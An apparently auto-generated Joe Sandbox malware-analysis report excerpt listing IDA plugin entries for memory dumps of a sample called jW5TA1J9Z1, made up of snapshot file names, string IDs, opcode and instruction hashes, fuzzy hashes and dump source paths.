                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63$r63$r63
                                                                      • API String ID: 0-1480572877
                                                                      • Opcode ID: 65411b98a772c77837172e9f67e7b86af8fdd75ae05819933af60c22bb2a5897
                                                                      • Instruction ID: b3cf9bdc3e21881924006851975ce43b39a0964fae2382d3ad138d105402d648
                                                                      • Opcode Fuzzy Hash: 65411b98a772c77837172e9f67e7b86af8fdd75ae05819933af60c22bb2a5897
                                                                      • Instruction Fuzzy Hash: 5AB1F57460AA468FE349DB28C0946A4BBA1FF5A340F4481BDD04EC7AD6DB28F895C7C0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: U$b43$r63
                                                                      • API String ID: 0-2976439527
                                                                      • Opcode ID: 8564295a96dc97f54eb156df778ab85d89d24c6d9597f0043b809a2751f3d989
                                                                      • Instruction ID: 601da59d4d7a40692addf4174d303b43515e1f26d5dea64cde7a70875666e014
                                                                      • Opcode Fuzzy Hash: 8564295a96dc97f54eb156df778ab85d89d24c6d9597f0043b809a2751f3d989
                                                                      • Instruction Fuzzy Hash: 6C91B43091D65ACFEB59DB1CC4946B97BA1FF5A300F5485F9C04ECB1DACA38B8498B81
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $W$r63
                                                                      • API String ID: 0-3993714074
                                                                      • Opcode ID: cc8091d0727056f7968fbf28af878e95f2c84123745507e210aeeaf499276f3d
                                                                      • Instruction ID: 8566be60574d9fe87aaf289a1d658b99d01f51bbfbc39db1e8076be6c9fd3fe0
                                                                      • Opcode Fuzzy Hash: cc8091d0727056f7968fbf28af878e95f2c84123745507e210aeeaf499276f3d
                                                                      • Instruction Fuzzy Hash: 3C515C71E0960ADBDB59DBA8C4515FDB7B1FF4A340F1081BAC00EE72D6CA382909CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0#=$p]=
                                                                      • API String ID: 0-2035564594
                                                                      • Opcode ID: aa67c9650e7646567caadbc0013acadec1085388bb05106cca6ca41b1402ba08
                                                                      • Instruction ID: 2050fd24652a4df5aadde31ed03edd46ad7bebf3c0e84addd63a225df77c8814
                                                                      • Opcode Fuzzy Hash: aa67c9650e7646567caadbc0013acadec1085388bb05106cca6ca41b1402ba08
                                                                      • Instruction Fuzzy Hash: 69228231A19A19CFDB98DB1CC895AB877E1FF59350B1481B9D00EC72E2DE25BC56CB80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: U$/3
                                                                      • API String ID: 0-1731019736
                                                                      • Opcode ID: add4889c4bdfe2b0c586cd444e2ac8b71a6fa1c13c2119ef178938d7eb92a6bd
                                                                      • Instruction ID: cf33c2c99ffbdb72abb421346d11b2fb5f44e7d60994a1571b3354dec1aecb73
                                                                      • Opcode Fuzzy Hash: add4889c4bdfe2b0c586cd444e2ac8b71a6fa1c13c2119ef178938d7eb92a6bd
                                                                      • Instruction Fuzzy Hash: 7C71D03191A64EDEEB54DB68C4546BDBBB0FF4A380F1045BAD00ED72E1DE287949DB80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $r63
                                                                      • API String ID: 0-3997696496
                                                                      • Opcode ID: 4caa31dcf75f3dcd7f38449bf07bcbc85eea6b7af3362687d0f45e24b45a85c0
                                                                      • Instruction ID: 18d1a93d592c5947f78a0beca15a9846213255cbca5d81c6a3e00235de7572c1
                                                                      • Opcode Fuzzy Hash: 4caa31dcf75f3dcd7f38449bf07bcbc85eea6b7af3362687d0f45e24b45a85c0
                                                                      • Instruction Fuzzy Hash: BF519E71D0A64ADFDB59DBA8C4555BDBBB1FF59341F1080BAD00EE72D2CA382809CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $r63
                                                                      • API String ID: 0-3997696496
                                                                      • Opcode ID: b0ed5bf8cbaae7e7b84e48e9948eda72194a81d328003ed8b2d0133b611f49a7
                                                                      • Instruction ID: d892f96d18ba1c1277008250180a07a46281f8699907d55416a280c898491b3f
                                                                      • Opcode Fuzzy Hash: b0ed5bf8cbaae7e7b84e48e9948eda72194a81d328003ed8b2d0133b611f49a7
                                                                      • Instruction Fuzzy Hash: 3F414B75D1960ACFDB09DBA8C4905FDBBB1FF49340F1080BAC01EA72D2CA396945CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63$r63
                                                                      • API String ID: 0-2640113253
                                                                      • Opcode ID: bf3a94be22097ae57a0962bebe9b8401952aaf30934648e59e951f22843c3a19
                                                                      • Instruction ID: 17e784050d1ba937c8c12bfe9f68678dfb15b9e8cb7eb1765bebc9581a553565
                                                                      • Opcode Fuzzy Hash: bf3a94be22097ae57a0962bebe9b8401952aaf30934648e59e951f22843c3a19
                                                                      • Instruction Fuzzy Hash: 55317071A0990A9FDB48DB5CD4919B8F7A1FF99350B50C179D01EC3296DF24B856CBC0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63$r63
                                                                      • API String ID: 0-2640113253
                                                                      • Opcode ID: cb9c904a2433f5d44fba8b46246b99ab6014d07eb24e6c9920656f7860a400d3
                                                                      • Instruction ID: eb9670618f831e623220dbdcae4822b27cc2c602e9f50002414d6ed8ebb6dd21
                                                                      • Opcode Fuzzy Hash: cb9c904a2433f5d44fba8b46246b99ab6014d07eb24e6c9920656f7860a400d3
                                                                      • Instruction Fuzzy Hash: 47317C35A0990ADFEB48DB5CD4919B8B3A2FF99350B508179E01ED3692CF34B856CBC0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63$r63
                                                                      • API String ID: 0-2640113253
                                                                      • Opcode ID: 2a574f5a2b1cdd07e34ae7a66dd2c3ec2478fb6af2b43a9cedcf347a3bbede02
                                                                      • Instruction ID: 928c47dc9e0865373c933512499cba92ea13071f15fb9a2999675466cac124eb
                                                                      • Opcode Fuzzy Hash: 2a574f5a2b1cdd07e34ae7a66dd2c3ec2478fb6af2b43a9cedcf347a3bbede02
                                                                      • Instruction Fuzzy Hash: 5B314971A1990A8FDB58EB18D8919B8F3A2FF99350B548179D01EC3692CE24BC168BC0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63$r63
                                                                      • API String ID: 0-2640113253
                                                                      • Opcode ID: 2b5aa7a462e13ffa20a4ee826dbb27e37f73e9226089e1c3c009af1b2a7c82e2
                                                                      • Instruction ID: e7c30d711349b46e6a632f870b9399babccd7492e26e44301b8de7ada8d2f0a7
                                                                      • Opcode Fuzzy Hash: 2b5aa7a462e13ffa20a4ee826dbb27e37f73e9226089e1c3c009af1b2a7c82e2
                                                                      • Instruction Fuzzy Hash: 72314672E0D9468FEB48A75CC8522E8B7D0FF99350F4081BAD01EC32D6ED14B85A87C0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: W
                                                                      • API String ID: 0-655174618
                                                                      • Opcode ID: 3497aee837b03281f9d6072959854924a4fdd556a85a396100125686e2f7ceb6
                                                                      • Instruction ID: 1398c117be5f3c6c6ac48b94ad188920cf592ec8dab4e430fc65f9622bab8085
                                                                      • Opcode Fuzzy Hash: 3497aee837b03281f9d6072959854924a4fdd556a85a396100125686e2f7ceb6
                                                                      • Instruction Fuzzy Hash: 4ED1D73090EB06CFD368DB2CD49157577E1FF4A750B1885BDC48EC76E2DA29B84A8781
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: U
                                                                      • API String ID: 0-3372436214
                                                                      • Opcode ID: a10f17c075cb330d0a69b9b9d5730fe568425fe86006b6bd9d6a44c83a3956a0
                                                                      • Opcode ID: 68ac97db03417706691d75b65cfb68329b74d627402e3308fb6cbdd9b20c94e2
                                                                      • Instruction ID: 1ab3e53183cb90ea72cd35af66dac5df00f9be710de3204c99574f9f7e582828
                                                                      • Opcode Fuzzy Hash: 68ac97db03417706691d75b65cfb68329b74d627402e3308fb6cbdd9b20c94e2
                                                                      • Instruction Fuzzy Hash: 73F06D3544E3C6DFD7029B7088516A63FA4AF47214F1840F6D85ACB0A2C66C6A1ADBA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 0dc75ec3b0b0f1b5973b2774d8e390f9b5fc0b57f939975d977d88cb41dda071
                                                                      • Instruction ID: 6642da5c5362c2b8720c4522fa14d1824a09e59127200401373c1df10afea694
                                                                      • Opcode Fuzzy Hash: 0dc75ec3b0b0f1b5973b2774d8e390f9b5fc0b57f939975d977d88cb41dda071
                                                                      • Instruction Fuzzy Hash: 0FE0657150E7C48FD71A963888698557FA4EF6720174941EEC045CF1A3EA1D9885C741
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 2aea2419dd350be5aca04bd3521452519eaf3f094047496acd3fb0bad66fac91
                                                                      • Instruction ID: 0fb0b3267fff6d9b5198283deacce8a94e31259c5d1254573310772f3fed70aa
                                                                      • Opcode Fuzzy Hash: 2aea2419dd350be5aca04bd3521452519eaf3f094047496acd3fb0bad66fac91
                                                                      • Instruction Fuzzy Hash: A7F0E56050E7C04FD71A9A3888684517FA0EF2720134A41EFC045CF1E3DA1D9C89C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: e1f8642bec90a755f629e2e1eb49705c2b01b23cbc706958886d2c13a3678dee
                                                                      • Instruction ID: c9c810f126dea306a8501ee048c5e76bf11b70ddc41edb852233b55d840ed36f
                                                                      • Opcode Fuzzy Hash: e1f8642bec90a755f629e2e1eb49705c2b01b23cbc706958886d2c13a3678dee
                                                                      • Instruction Fuzzy Hash: 36F0E56150E7C48FC71AEA3488698117F60EF2720134A42EEC045CF1A3EA1DD884C702
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: c5757a95ec6beab1320a8cb2cc1ad5f59b41cd23fa1a2e89d62d099f3aaee16b
                                                                      • Instruction ID: 77caddb6fa254af773627cb71959afec764102713b10ca85366777bc4bd10943
                                                                      • Opcode Fuzzy Hash: c5757a95ec6beab1320a8cb2cc1ad5f59b41cd23fa1a2e89d62d099f3aaee16b
                                                                      • Instruction Fuzzy Hash: 31F0657194A7C08FCB19DA3888A9855BF60EF6720174A42EEC045CF1A7DA2DD88ACB41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 906a854626dc74c83dd7189e40aec860d618a4003808e0508426c040b632cd41
                                                                      • Instruction ID: c4a66ddf08b53fa0a81383682ee6730c9b94841a9b68fe8d8b89c9ab04022be3
                                                                      • Opcode Fuzzy Hash: 906a854626dc74c83dd7189e40aec860d618a4003808e0508426c040b632cd41
                                                                      • Instruction Fuzzy Hash: 38F0657190E7C48FCB1ADB7488698557FA0EF6720174A55EFC045CF1A7EA2D8889CB41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 2b698a6ebc5b36a0d445107bf54530d868cbf990d09814e7e97f06061df9b199
                                                                      • Instruction ID: a008cd5dd3ea68c49a7a6f871d611836c25210d640683a261409664c36777008
                                                                      • Opcode Fuzzy Hash: 2b698a6ebc5b36a0d445107bf54530d868cbf990d09814e7e97f06061df9b199
                                                                      • Instruction Fuzzy Hash: 49E0926144E3C04FCB06AB348875C453FA0DE2721178A40DEC045CB0B3D21E9849C702
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 9669c547a404fca68f8ed6777d246c21afdc2124e53a4440b28720bff43f21f7
                                                                      • Instruction ID: 3a5c915d21f0fd17ae100fb08c38475f9233a177a8b138436f81daddd30c7a8f
                                                                      • Opcode Fuzzy Hash: 9669c547a404fca68f8ed6777d246c21afdc2124e53a4440b28720bff43f21f7
                                                                      • Instruction Fuzzy Hash: 47E0ED6154E7C04FD70A9B74886A9547F60AE6721074A41EEC089CF5B3D61E9849C711
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: e59e868506ee6fbd5b508b096e1e25ddf965de27926d9a3e97c95849bdfe97c5
                                                                      • Instruction ID: b6de03b5f97559c7f25ea08c8357f04626411faf07c42436bac23bd72c18a450
                                                                      • Opcode Fuzzy Hash: e59e868506ee6fbd5b508b096e1e25ddf965de27926d9a3e97c95849bdfe97c5
                                                                      • Instruction Fuzzy Hash: 65E01A7144F7C04FCB4AEB7488698447FB0AE6721078A40EEC049CF1B3E62E8849CB01
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 64eb5e5e4d750f7659160ff548d98ffe11805b61fd02f7141648fd94b7cb76c6
                                                                      • Instruction ID: 0f74f1312c94d4367b3f86b64d29c7bed787e989357995fffc0e05907a7b0718
                                                                      • Opcode Fuzzy Hash: 64eb5e5e4d750f7659160ff548d98ffe11805b61fd02f7141648fd94b7cb76c6
                                                                      • Instruction Fuzzy Hash: 2CE01A6144F7C08FCB4AEB7488698447FA0AE6721078A41EEC049CF1B7EA2E8889C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 846e4a5d059cf0265acdaf419123108c57a4d2792be10057cf2b03f78cfe3a27
                                                                      • Instruction ID: 7b0607994c8ea3cb700f69db048fb23a2545dbb31ffe941339d96f1f318d5907
                                                                      • Opcode Fuzzy Hash: 846e4a5d059cf0265acdaf419123108c57a4d2792be10057cf2b03f78cfe3a27
                                                                      • Instruction Fuzzy Hash: 51D0C23060A5448FEB18EA388458824BB80EB6721134442ADC00ACB1A6EE29C8C5CB40
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: f6a869a563c7624f37e8c0b323227466f00712f37d68e79be5952309d3bb38f8
                                                                      • Instruction ID: d2ce6dfd02f7d0007ac67d43061c46621dcd86df6ee53355c7598001bd065cd1
                                                                      • Opcode Fuzzy Hash: f6a869a563c7624f37e8c0b323227466f00712f37d68e79be5952309d3bb38f8
                                                                      • Instruction Fuzzy Hash: A1D05B714466848FDB08EB788465C157F94DF6B35174940ECC14ACB5B6D5299885C741
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 043fd15bddd45df5a01fa29052eccfcb467950e879b60e2068c619e9c9760b71
                                                                      • Instruction ID: f92f6f2029baedffd9d2c70eae151d9e39ee0a9c8eeeef2e2b1d56f18ca1e350
                                                                      • Opcode Fuzzy Hash: 043fd15bddd45df5a01fa29052eccfcb467950e879b60e2068c619e9c9760b71
                                                                      • Instruction Fuzzy Hash: 24E0C242D0E3829FF7164B7808A107C5E50DF1B380B8986FAC25E4A1E3D808390D63D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 15dbeabe5d1fe634ee0854dd3a4ccbc5efa93664b798c4ce3b30a0d437bec96a
                                                                      • Instruction ID: 2d8306b482a74b2dcf4266b8e65865ff8fbcf0bc2c18607079c6900b40839c7b
                                                                      • Opcode Fuzzy Hash: 15dbeabe5d1fe634ee0854dd3a4ccbc5efa93664b798c4ce3b30a0d437bec96a
                                                                      • Instruction Fuzzy Hash: 71F1F8347589198FDB88FF2DD4A5E6973D2EBA8740B1140ADE10EC73A6CD24EC91CB81
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 41018236f34c83e9cb226072ae7105a93a87749d87aebdfaf197825ebf0d742e
                                                                      • Instruction ID: 87863d2bef9815ff9cb80366ae63b1b95c28cf769b2c7958bb7e0fd312928bef
                                                                      • Opcode Fuzzy Hash: 41018236f34c83e9cb226072ae7105a93a87749d87aebdfaf197825ebf0d742e
                                                                      • Instruction Fuzzy Hash: 66D14932A1DE498FEB55DBA8C8559B97FE1EF66350B0441BED04DC72A3CE24AC0587C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6aa4b16640248f342b531b1fdde1cc1f2cd485b807a35e8744549c5fc0c63e37
                                                                      • Instruction ID: 8818d17590ef18b55dfcc8e433417808a56f28e327d3041424a635b0cb80a1a7
                                                                      • Opcode Fuzzy Hash: 6aa4b16640248f342b531b1fdde1cc1f2cd485b807a35e8744549c5fc0c63e37
                                                                      • Instruction Fuzzy Hash: 1271F626D4E2D6EAE716676CE8116F83B94AF473A4B1945F7D08DCA0E3CD0D384983D2
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 36f44a75e9156282438916b522a74c25c5cc220c13fc903596d9b75f5587361e
                                                                      • Instruction ID: 81675a6487acff60f87f63ec4328ab103cf8fb49d0c87efcb3460dcd8782e1fb
                                                                      • Opcode Fuzzy Hash: 36f44a75e9156282438916b522a74c25c5cc220c13fc903596d9b75f5587361e
                                                                      • Instruction Fuzzy Hash: 8EC1BF3051A946CBEB09CF18D4A05B53BA1FF4A351B5485FDC84E8B59BDA38F886CBC1
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f0b2589a85d80a3784c48ef3b2f7c86d46d27b02b24d0147b32efcc6f910af9d
                                                                      • Instruction ID: 5f0e687ad1d3f497899c36a7b58fae165dd576a58e4767a19fc3f65b43b828c3
                                                                      • Opcode Fuzzy Hash: f0b2589a85d80a3784c48ef3b2f7c86d46d27b02b24d0147b32efcc6f910af9d
                                                                      • Instruction Fuzzy Hash: DBC1AD7451A556CBEB09CF18C0D05B53BA1FF4A350B6485FDC84E8B6DACA38F896CB81
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d821b1bb70bd4cee198d681af5c61c1cc1f3c48b86701aac6b0dd4b9ad5541b9
                                                                      • Instruction ID: 1d39f6c2d03d798525a430017a15438c155fece798043331af7bfcc2c54e9ec3
                                                                      • Opcode Fuzzy Hash: d821b1bb70bd4cee198d681af5c61c1cc1f3c48b86701aac6b0dd4b9ad5541b9
                                                                      • Instruction Fuzzy Hash: E831543160C945CFDB58EB28C499EA877E1FF6931070445AED00EC7296DE34F895CB81
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c22c6884aca8a7b35bdb14c9e5808c61c90e4557e06d60aef903eed286d3d586
                                                                      • Instruction ID: 1012e9f0df535156574365aadf4f5c26f9688c9276467e34e25c4bc3e964099a
                                                                      • Opcode Fuzzy Hash: c22c6884aca8a7b35bdb14c9e5808c61c90e4557e06d60aef903eed286d3d586
